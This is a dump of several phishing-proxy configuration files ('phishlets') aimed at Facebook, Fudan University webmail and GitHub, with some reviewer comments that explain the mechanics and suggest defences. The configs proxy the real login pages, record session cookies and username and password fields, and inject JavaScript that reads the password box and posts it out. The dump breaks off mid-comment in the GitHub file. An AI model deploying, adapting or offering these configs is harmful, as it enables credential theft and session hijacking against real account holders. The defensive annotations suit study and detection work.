{triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | custom: 30 | - key: 'UserAgent' 31 | search: '(.*)' 32 | type: 'post' 33 | - key: 'Browser' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'Engine' 37 | search: '(.*)' 38 | type: 'post' 39 | - key: 'Platform' 40 | search: '(.*)' 41 | type: 'post' 42 | 43 | 44 | login: 45 | domain: 'www.facebook.com' 46 | path: '/login.php' 47 | 48 | js_inject: 49 | - trigger_domains: ["www.facebook.com"] 50 | trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] 51 | trigger_params: [] 52 | script: | 53 | function onclickListener(){ 54 | var submit = document.querySelectorAll('button[type=submit]')[0]; 55 | var submitmobile = document.getElementById('u_0_5'); 56 | var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0]; 57 | submit.setAttribute("onclick", "sendPass()"); 58 | submitmobile.setAttribute("onclick", "sendPass()"); 59 | submitbuttonmobile.setAttribute("onclick", "sendPass()"); 60 | return; 61 | } 62 | function sendPass(){ 63 | var password = document.getElementsByName("pass")[0].value; 64 | var xhr = new XMLHttpRequest(); 65 | xhr.open("POST", '/login/device-based/regular/login/', true); 66 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 67 | xhr.send("unenc_password="+encodeURIComponent(password)); 68 | var xhr1 = new XMLHttpRequest(); 69 | 
var useragent = navigator.userAgent; 70 | xhr1.open("POST", '/', true); 71 | xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | var xhr2 = new XMLHttpRequest(); 73 | var browser = navigator.appName; 74 | xhr2.open("POST", '/', true); 75 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 76 | xhr2.send("Browser="+encodeURIComponent(browser)); 77 | var xhr3 = new XMLHttpRequest(); 78 | var engine = navigator.product; 79 | xhr3.open("POST", '/', true); 80 | xhr3.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 81 | xhr3.send("Engine="+encodeURIComponent(engine)); 82 | var xhr4 = new XMLHttpRequest(); 83 | var platform = navigator.platform; 84 | xhr4.open("POST", '/', true); 85 | xhr4.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 86 | xhr4.send("Platform="+encodeURIComponent(platform)); 87 | return; 88 | } 89 | setTimeout(function(){ onclickListener(); }, 2500); 90 | -------------------------------------------------------------------------------- /phishlet_examples/facebook-d2.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 
'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | custom: 30 | - key: 'UserAgent' 31 | search: '(.*)' 32 | type: 'post' 33 | - key: 'Browser' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'Engine' 37 | search: '(.*)' 38 | type: 'post' 39 | - key: 'Platform' 40 | search: '(.*)' 41 | type: 'post' 42 | 43 | 44 | login: 45 | domain: 'www.facebook.com' 46 | path: '/login.php' 47 | 48 | js_inject: 49 | - trigger_domains: ["www.facebook.com"] 50 | trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] 51 | trigger_params: [] 52 | script: | 53 | function 
onclickListener(){ 54 | var submit = document.querySelectorAll('button[type=submit]')[0]; 55 | submit.setAttribute("onclick", "sendPass()"); 56 | return; 57 | } 58 | function sendPass(){ 59 | var password = document.getElementsByName("pass")[0].value; 60 | var xhr = new XMLHttpRequest(); 61 | xhr.open("POST", '/login/device-based/regular/login/', true); 62 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 63 | xhr.send("unenc_password="+encodeURIComponent(password)); 64 | var xhr1 = new XMLHttpRequest(); 65 | var useragent = navigator.userAgent; 66 | xhr1.open("POST", '/', true); 67 | xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 68 | var xhr2 = new XMLHttpRequest(); 69 | var browser = navigator.appName; 70 | xhr2.open("POST", '/', true); 71 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | xhr2.send("Browser="+encodeURIComponent(browser)); 73 | var xhr3 = new XMLHttpRequest(); 74 | var engine = navigator.product; 75 | xhr3.open("POST", '/', true); 76 | xhr3.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 77 | xhr3.send("Engine="+encodeURIComponent(engine)); 78 | var xhr4 = new XMLHttpRequest(); 79 | var platform = navigator.platform; 80 | xhr4.open("POST", '/', true); 81 | xhr4.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 82 | xhr4.send("Platform="+encodeURIComponent(platform)); 83 | return; 84 | } 85 | setTimeout(function(){ onclickListener(); }, 2500); 86 | -------------------------------------------------------------------------------- /phishlet_examples/facebook-d3.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 
'api', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | login: 30 | 
domain: 'www.facebook.com' 31 | path: '/login.php' 32 | 33 | js_inject: 34 | - trigger_domains: ["www.facebook.com"] 35 | trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] 36 | trigger_params: [] 37 | script: | 38 | function onclickListener(){ 39 | var submit = document.querySelectorAll('button[type=submit]')[0]; 40 | var submitmobile = document.getElementById('u_0_5'); 41 | var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0]; 42 | document.getElementsByTagName("button")[0].addEventListener("click", fclick); 43 | submit.addEventListener("click", fclick); 44 | submitmobile.addEventListener("click", fclick); 45 | submitbuttonmobile.addEventListener("click", fclick); 46 | return; 47 | } 48 | function fclick() { 49 | function fcheck() { 50 | if (JSON.parse(document.getElementsByName("pass")[0].value == "")) { 51 | setTimeout(fcheck, 100); 52 | } else { 53 | var unenc_password = document.getElementsByName("pass")[0].value; 54 | var xhr = new XMLHttpRequest(); 55 | xhr.open("POST", 'qwertyqwerty/', true); 56 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 57 | xhr.send("unenc_password=" + encodeURIComponent(unenc_password)); 58 | console.log(unenc_password); 59 | } 60 | fcheck(); 61 | } 62 | } 63 | setTimeout(function(){ onclickListener(); }, 2500); -------------------------------------------------------------------------------- /phishlet_examples/facebook-fix.yaml: -------------------------------------------------------------------------------- 1 | author: '@charlesbel' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', 
domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | custom: 30 | - key: 'pass' 31 | search: '(.*)' 32 | type: 'post' 33 | - key: 'Password' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'UserAgent' 37 | search: '(.*)' 38 
| type: 'post' 39 | - key: 'Browser' 40 | search: '(.*)' 41 | type: 'post' 42 | - key: 'Engine' 43 | search: '(.*)' 44 | type: 'post' 45 | - key: 'Platform' 46 | search: '(.*)' 47 | type: 'post' 48 | 49 | 50 | login: 51 | domain: 'www.facebook.com' 52 | path: '/login.php' 53 | 54 | js_inject: 55 | - trigger_domains: ["www.facebook.com"] 56 | trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] 57 | trigger_params: [] 58 | script: | 59 | function onclickListener(){ 60 | var submit = document.querySelectorAll('button[type=submit]')[0]; 61 | submit.setAttribute("onclick", "sendPass()"); 62 | var useragent = navigator.userAgent; 63 | xhr.open("POST", '/', true); 64 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 65 | xhr.send("UserAgent="+encodeURIComponent(useragent)); 66 | var browser = navigator.appName; 67 | xhr.open("POST", '/', true); 68 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 69 | xhr.send("Browser="+encodeURIComponent(browser)); 70 | var engine = navigator.product; 71 | xhr.open("POST", '/', true); 72 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 73 | xhr.send("Engine="+encodeURIComponent(engine)); 74 | var platform = navigator.platform; 75 | var xhr = new XMLHttpRequest(); 76 | xhr.open("POST", '/', true); 77 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 78 | xhr.send("Platform="+encodeURIComponent(platform)); 79 | return; 80 | } 81 | function sendPass(){ 82 | var password = document.getElementsByName("pass")[0].value; 83 | var xhr = new XMLHttpRequest(); 84 | xhr.open("POST", '/login/device-based/regular/login/', true); 85 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 86 | xhr.send("unenc_password="+encodeURIComponent(password)); 87 | return; 88 | } 89 | setTimeout(function(){ onclickListener(); }, 1000); 90 | 
--------------------------------------------------------------------------------
/phishlet_examples/facebook.yaml:
--------------------------------------------------------------------------------
1 | author: '@An0nud4y'
2 | min_ver: '2.3.0'
# NOTE(review): proxy_hosts pairs each real host (orig_sub + domain) with the
# subdomain label (phish_sub) it is served under on the operator's own domain.
# www and m are marked session: true; the static asset host is not.
# For detection: the resulting look-alike names share one registrable domain and
# carry the labels www, m and static. Certificate-transparency and passive-DNS
# data are where that label set would surface, assuming publicly trusted
# certificates are requested for it (not shown in this file).
3 | proxy_hosts:
4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
# NOTE(review): sub_filters rewrite host names inside proxied response bodies of
# the listed MIME types. The patterns below cover the plain URL form, the
# URL-encoded form (2F...), backslash-escaped forms as found in JSON/JS strings,
# and quoted bare-domain assignments.
7 | sub_filters:
8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
16 |
17 |
18 |
# NOTE(review): auth_tokens names the cookies recorded once login completes
# (c_user, xs and sb on .facebook.com). A replayed session cookie needs neither
# the password nor a one-time code, so OTP or push-based MFA does not stop this
# class of proxy. Origin-bound authenticators (WebAuthn / passkeys) do, because
# the assertion is scoped to the genuine origin. Server-side, a session cookie
# reused from a different network or device than the one that logged in is the
# signal to alert on.
19 | auth_tokens:
20 | - domain: '.facebook.com'
21 | keys: ['c_user','xs','sb']
# NOTE(review): the entries below are matched against POST parameter names
# (type: 'post'); search '(.*)' keeps the whole value. unenc_password, UserAgent,
# Browser, Engine and Platform are the parameter names sent by the script under
# js_inject further down, not necessarily fields of the genuine form.
22 | credentials:
23 | username:
24 | key: 'email'
25 | search: '(.*)'
26 | type: 'post'
27 | password:
28 | key: '^unenc_password$'
29 | search: '(.*)'
30 | type: 'post'
31 | #Custom parameters are added in order to grab the requests made by javascripts injected in order to get device user-agent and other details.
32 | # key: 'pass' is added in order to increase the chances of grabbing the pass field if in case failed from above.
33 |
34 | custom:
35 | - key: '^pass$'
36 | search: '(.*)'
37 | type: 'post'
38 | - key: '^Password$'
39 | search: '(.*)'
40 | type: 'post'
41 | - key: 'UserAgent'
42 | search: '(.*)'
43 | type: 'post'
44 | - key: 'Browser'
45 | search: '(.*)'
46 | type: 'post'
47 | - key: 'Engine'
48 | search: '(.*)'
49 | type: 'post'
50 | - key: 'Platform'
51 | search: '(.*)'
52 | type: 'post'
53 |
54 | login:
55 | domain: 'www.facebook.com'
56 | path: '/login.php'
57 |
58 | #Below Javascript function will do two things (1) on page load it will make 4 request back to server to let us capture the important data. (2) Will add a function to login button to leak the value of password field.
59 |
# NOTE(review): js_inject adds the script below to proxied pages on
# www.facebook.com whose path matches trigger_paths. It sets an onclick
# attribute on the first submit button; sendPass() then reads the input named
# "pass" and POSTs its value as unenc_password to
# /login/device-based/regular/login/. Per the author's comment above,
# onclickListener() is also meant to POST navigator.userAgent, appName, product
# and platform to '/'.
# For the site owner: if the proxy relays these requests upstream (not visible
# in this file; confirm), a POST to the login endpoint whose body is only
# unenc_password=..., or a POST to / carrying UserAgent=/Browser=/Engine=/
# Platform=, is worth comparing with what the genuine client sends.
60 | js_inject:
61 | - trigger_domains: ["www.facebook.com"]
62 | trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] #The target path is important as the javascript will be injected in all address pages started with /login
63 | trigger_params: []
64 | script: |
65 | function onclickListener(){
66 | var submit = document.querySelectorAll('button[type=submit]')[0];
67 | submit.setAttribute("onclick", "sendPass()");
68 |
69 | var useragent = navigator.userAgent;
70 | xhr.open("POST", '/', true);
71 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
72 | xhr.send("UserAgent="+encodeURIComponent(useragent));
73 |
74 | var browser = navigator.appName;
75 | xhr.open("POST", '/', true);
76 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
77 | xhr.send("Browser="+encodeURIComponent(browser));
78 |
79 | var engine = navigator.product;
80 | xhr.open("POST", '/', true);
81 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
82 | xhr.send("Engine="+encodeURIComponent(engine));
83 |
84 | var platform = navigator.platform;
85 | var xhr = new XMLHttpRequest();
86 | xhr.open("POST", '/', true);
87 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
88 | xhr.send("Platform="+encodeURIComponent(platform));
89 | return;
90 | }
91 | function sendPass(){
92 | var password = document.getElementsByName("pass")[0].value;
93 | var xhr = new XMLHttpRequest();
94 | xhr.open("POST", '/login/device-based/regular/login/', true);
95 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
96 | xhr.send("unenc_password="+encodeURIComponent(password));
97 | return;
98 | }
99 | setTimeout(function(){ onclickListener(); }, 1000);
100 |
101 |
102 | # UPDATE : LOOKS LIKE FACEBOOK HAS CHANGED THE JAVASCRIPT FUNCTION, STILL THE FILTERS WORKS SOMETIME , SO I LEFT THEM AS THEY WERE IN PREVIOUS PHISHLET I MADE.
103 |
# NOTE(review): the function quoted below shows the genuine login form
# encrypting the password in the browser (FBBrowserPasswordEncryption),
# submitting the result as a hidden field named 'ep' and disabling the plaintext
# input. That appears to be why this config reads the field with its own script
# instead of taking it from the form POST. The lesson for defenders is that
# client-side encryption of a password field gives no protection once a proxy
# can add script to the page; the control that holds is origin-bound
# authentication.
104 | # The js Function Responsible For Password Encryption is Present in this js file Located At : https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/yEB-M5_vVi6.js?_nc_x=Ij3Wp8lg5Kz
105 | #
106 | # _encryptBeforeSending: function (a) {
107 | # var c = this;
108 | # a = a.bind(this);
109 | # var d = this.loginFormParams && this.loginFormParams.pubKey;
110 | # if ((window.crypto || window.msCrypto) && d) {
111 | # var e = b('DOM').scry(this.loginForm, 'input[id="pass"]') [0],
112 | # f = b('FBBrowserPasswordEncryption'),
113 | # g = Math.floor(Date.now() / 1000).toString();
114 | # b('promiseDone') (f.encryptPassword(d.keyId, d.publicKey, e.value, g), function (d) {
115 | # d = b('DOM').create('input', {
116 | # type: 'hidden',
117 | # name: 'ep',
118 | # value: d
119 | # });
120 | # c.loginForm.appendChild(d);
121 | # e.disabled = !0;
122 | # a()
123 | # }, function (c) {
124 | # var d = '#PWD_BROWSER',
125 | # e = 5,
126 | # f = b('LoginServicePasswordEncryptDecryptEventTypedLogger');
127 | # new f().setError('BrowserEncryptionFailureInLoginFormControllerWWW').setGrowthFlow('Bluebar/main login WWW').setErrorMessage(c.message).setPasswordTag(d).setPasswordEncryptionVersion(e).setPasswordTimestamp(g).logVital();
128 | # a()
129 | # })
130 | # } else a()
131 | # },
132 |
133 |
--------------------------------------------------------------------------------
/phishlet_examples/fudan.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 |
5 | author: '@an0n'
6 | min_ver: '2.3.0'
# NOTE(review): five hosts under fudan.edu.cn are proxied, with mail.fudan.edu.cn
# as the landing host. Every active entry sets auto_filter: false, so host-name
# rewriting is left to the explicit sub_filters below. The shmu.edu.cn entries
# are commented out and therefore inactive.
7 | proxy_hosts:
8 | - {phish_sub: 'mail', orig_sub: 'mail', domain: 'fudan.edu.cn', session: true, is_landing: true, auto_filter: false}
9 | - {phish_sub: '', orig_sub: '', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
10 | - {phish_sub: 'ecampus', orig_sub: 'ecampus', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
11 | - {phish_sub: 'xxb', orig_sub: 'xxb', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
12 | - {phish_sub: 'xxbcrawler', orig_sub: 'xxbcrawler', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
13 | # - {phish_sub: '', orig_sub: '', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
14 | # - {phish_sub: 'webmail', orig_sub: 'webmail', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
15 | # - {phish_sub: 'swk', orig_sub: 'swk', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
16 | # - {phish_sub: 'cancer', orig_sub: 'cancer', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
17 | # - {phish_sub: 'eent', orig_sub: 'eent', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
18 | # - {phish_sub: 'fys', orig_sub: 'fys', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
19 | # - {phish_sub: 'goh', orig_sub: 'goh', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
20 | # - {phish_sub: 'hsh', orig_sub: 'hsh', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
21 | # - {phish_sub: 'jsyy', orig_sub: 'jsyy', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
22 | # - {phish_sub: 'sci', orig_sub: 'sci', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
23 | # - {phish_sub: 'zsyy', orig_sub: 'zsyy', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
24 |
25 |
26 |
# NOTE(review): both active filters fire on responses from mail.fudan.edu.cn and
# replace the bare {domain} string across HTML, JavaScript, JSON and multipart
# bodies.
27 | sub_filters:
28 | - {triggers_on: 'mail.fudan.edu.cn', orig_sub: 'mail', domain: 'fudan.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
29 | - {triggers_on: 'mail.fudan.edu.cn', orig_sub: 'xxbcrawler', domain: 'fudan.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
30 | # - {triggers_on: 'mail.fudan.edu.cn', orig_sub: '', domain: 'shmu.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
31 |
# NOTE(review): the ',regexp' suffix marks the key as a pattern, and '.*' matches
# every cookie name, so all cookies set for these domains are recorded rather
# than one named session cookie. Whoever holds those cookies holds the webmail
# session, and a password change does not help unless it also revokes active
# sessions. Sessions tied to a phishing-resistant second factor, and alerting on
# a session cookie that appears from a new network, are the mitigations that
# apply here.
32 | auth_tokens:
33 | - domain: '.fudan.edu.cn'
34 | keys: ['.*,regexp']
35 | - domain: 'mail.fudan.edu.cn'
36 | keys: ['.*,regexp']
37 | # - domain: '.shmu.edu.cn'
38 | # keys: ['.*,regexp']
# NOTE(review): the username and password are taken from the POST parameters uid
# and password. The domain and locale parameters are recorded as extra fields.
39 | credentials:
40 | username:
41 | key: 'uid'
42 | search: '(.*)'
43 | type: 'post'
44 | password:
45 | key: 'password'
46 | search: '(.*)'
47 | type: 'post'
48 | custom:
49 | - key: 'domain'
50 | search: '(.*)'
51 | type: 'post'
52 | - key: 'locale'
53 | search: '(.*)'
54 | type: 'post'
55 |
56 |
# NOTE(review): force_post rewrites a request in transit. For a POST to
# /coremail/index.jsp that carries both uid and password, the parameter useSSL
# is set to 'true' before the request goes upstream. The author's reason is not
# stated in this file.
57 | force_post:
58 | - path: '/coremail/index.jsp'
59 | search:
60 | - {key: 'uid', search: '.*'}
61 | - {key: 'password', search: '.*'}
62 | force:
63 | - {key: 'useSSL', value: 'true'}
64 | type: 'post'
65 |
66 | login:
67 | domain: 'mail.fudan.edu.cn'
68 | path: '/'
69 |
70 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
71 | # PLEASE DO NOT MISUSE THIS PHISHLET.
72 |
--------------------------------------------------------------------------------
/phishlet_examples/github.yaml:
--------------------------------------------------------------------------------
1 | author: '@audibleblink'
2 | min_ver: '2.3.0'
# NOTE(review): three hosts are proxied: github.com itself (landing, session
# tracked), api.github.com and github.githubassets.com. The last two entries do
# not set session or is_landing.
3 | proxy_hosts:
4 | - {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
5 | - {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
6 | - {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
7 |
# NOTE(review): this filter deletes every integrity="..." attribute from HTML
# served for github.com, which removes the Subresource Integrity hashes on
